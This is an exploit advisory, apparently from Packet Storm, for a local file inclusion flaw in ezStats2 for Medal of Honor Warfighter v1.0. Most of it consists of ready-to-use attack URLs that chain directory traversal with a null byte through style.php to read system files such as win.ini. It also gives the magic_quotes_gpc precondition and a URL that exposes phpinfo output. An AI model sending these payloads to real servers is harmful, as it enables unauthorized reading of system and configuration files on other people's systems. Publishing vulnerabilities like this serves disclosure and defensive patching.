ezStats2 for Medal of Honor Warfighter version 1.0 suffers from a local file inclusion vulnerability.
ff61a0d26f12481d625b37a5a47fffd3ce8c580f6db84af42abb84f45e5f149a#################################################
### Exploit Title: ezStats2 for Medal of Honor Warfighter v1.0 Local File Inclusion Vulnerability
### Date: 02/05/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.ezstats.org/
### Software Link: http://ezstats.googlecode.com/files/ezStats2_MoHW_v1.0a.zip
### Tested on: Linux/Windows
#################################################
http://127.0.0.1/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
http://127.0.0.1/ezStats2_mohw/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
############################################
# Notes :
1- Must be magic_quotes_gpc = Off
2- phpinfo() :
http://127.0.0.1/ezStats2_mohw/admin/apitest.php?info
# Greetz to my friendz
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed